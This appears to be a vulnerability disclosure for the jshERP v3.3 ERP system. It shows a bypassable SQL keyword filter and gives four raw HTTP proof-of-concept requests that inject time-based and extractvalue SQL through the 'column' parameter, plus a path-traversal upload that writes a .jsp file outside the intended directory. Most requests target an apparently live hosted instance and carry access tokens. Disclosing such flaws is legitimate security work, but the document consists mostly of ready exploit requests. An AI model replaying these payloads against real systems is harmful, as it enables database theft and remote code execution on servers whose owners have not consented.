There are 4 sql injection vulnerabilities and 1 file upload vulnerability in jshERP v3.3

[cxcxcxcxcxcxcxc]

public static String safeSqlParse(String originStr){
return originStr.replaceAll("(?i)" + regex, "");
}

public final static String regex = "'|#|%|;|--| and | and|and | or | or|or | not | not|not " +
"| use | use|use | insert | insert|insert | delete | delete|delete | update | update|update " +
"| select | select|select | count | count|count | group | group|group | union | union|union " +
"| create | create|create | drop | drop|drop | truncate | truncate|truncate | alter | alter|alter " +
"| grant | grant|grant | execute | execute|execute | exec | exec|exec | xp_cmdshell | xp_cmdshell|xp_cmdshell " +
"| call | call|call | declare | declare|declare | source | source|source | sql | sql|sql ";

Filtering can be bypassed like this: a andnd s selectelect

sql POC:
GET /jshERP-boot/material/getListWithStock?categoryId=&materialParam=%30%78%36%34%36%35%37%33%36%33%32%37%32%30%36%31%36%65%36%34%32%30%37%33%36%63%36%35%36%35%37%30%32%38%33%35%32%39%32%33&position=%30%78%36%34%36%35%37%33%36%33%32%37%32%30%36%31%36%65%36%34%32%30%37%33%36%63%36%35%36%35%37%30%32%38%33%35%32%39%32%33&zeroStock=0&mpList=111&column=if(1,(s%20selectelect%20sleep(1)),(s%20selectelect%20sleep(1)))&order=asc+limit+%3f,%3f+-'-&field=id,,rowIndex,action,mBarCode,name,standard,model,color,categoryName,position,unitName,purchaseDecimal,initialStock,currentStock,currentStockPrice,currentWeight&currentPage=1&pageSize=10&depotIds=1 HTTP/2
Host: cloud.huaxiaerp.com
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1704888493; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1704958316
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Access-Token: 9a45f201f4594fd7a66aee82d526e155_151076
Referer: https://cloud.huaxiaerp.com/report/material_stock

sql POC:
GET /jshERP-boot/depotHead/findInOutDetail?organId=&number=&materialParam=xxxxxxxxxxxxxxxxxxxxxxxx&depotId=11111&beginTime=2024-01-01&endTime=2024-01-11&type=%E5%85%A5%E5%BA%93&creator=&organizationId=&remark=&column=%65%78%74%72%61%63%74%76%61%6c%75%65%28%31%2c%75%73%65%72%28%29%29%20%61%73%63%20%6c%69%6d%69%74%20%3f%2c%3f%20%2d%27%2d&order=desc&field=id,,rowIndex,number,barCode,mname,standard,model,mUnit,operNumber,unitPrice,allPrice,taxRate,taxMoney,sname,dname,operTime,newRemark&currentPage=1&pageSize=10 HTTP/1.1
Host: 192.168.120.133:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

sql3 POC:
GET /jshERP-boot/depotHead/findInOutMaterialCount?organId=&materialParam=&depotId=&organizationId=&beginTime=2024-01-01&endTime=2024-01-12&type=%E5%87%BA%E5%BA%93&column=if(1,(s%20selectelect%20sleep(5)),(s%20selectelect%20sleep(5)))&order=asc+limit+%3f,%3f+-'-&field=id,,rowIndex,barCode,mName,standard,model,categoryName,materialUnit,numSum,priceSum&currentPage=1&pageSize=10 HTTP/2
Host: cloud.huaxiaerp.com
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1704888493; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1704958316
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Access-Token: 9a45f201f4594fd7a66aee82d526e155_151076
Referer: https://cloud.huaxiaerp.com/report/out_material_count

sql4 POC:
GET /jshERP-boot/depotHead/findAllocationDetail?organId=&number=&materialParam=&depotId=&depotIdF=&organizationId=&beginTime=2024-01-01&endTime=2024-01-12&subType=%E8%B0%83%E6%8B%A8&remark=&column=if(1,(s%20selectelect%20sleep(1)),(s%20selectelect%20sleep(1)))&order=asc+limit+%3f,%3f+-'-&field=id,,rowIndex,number,barCode,mname,standard,model,mUnit,operNumber,unitPrice,allPrice,dname,sname,operTime,newRemark&currentPage=1&pageSize=10 HTTP/2
Host: cloud.huaxiaerp.com
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1704888493; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1704958316
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Access-Token: 9a45f201f4594fd7a66aee82d526e155_151076
Referer: https://cloud.huaxiaerp.com/report/allocation_detail

fileupload POC:
No strong checksum for filenames, biz parameters can be spliced into paths

POST /jshERP-boot/systemConfig/upload?biz=../../../home/jshERP/jshERP-web/js HTTP/2
Host: cloud.huaxiaerp.com
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1704888493; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1704888854
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Access-Token: d22cf07e24434e33a82e43a85be5b0bb_151076
Content-Type: multipart/form-data; boundary=---------------------------18460234522258
Content-Length: 202
Upgrade-Insecure-Requests: 1

-----------------------------18460234522258
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-Type: text/plain

this is a test
-----------------------------18460234522258--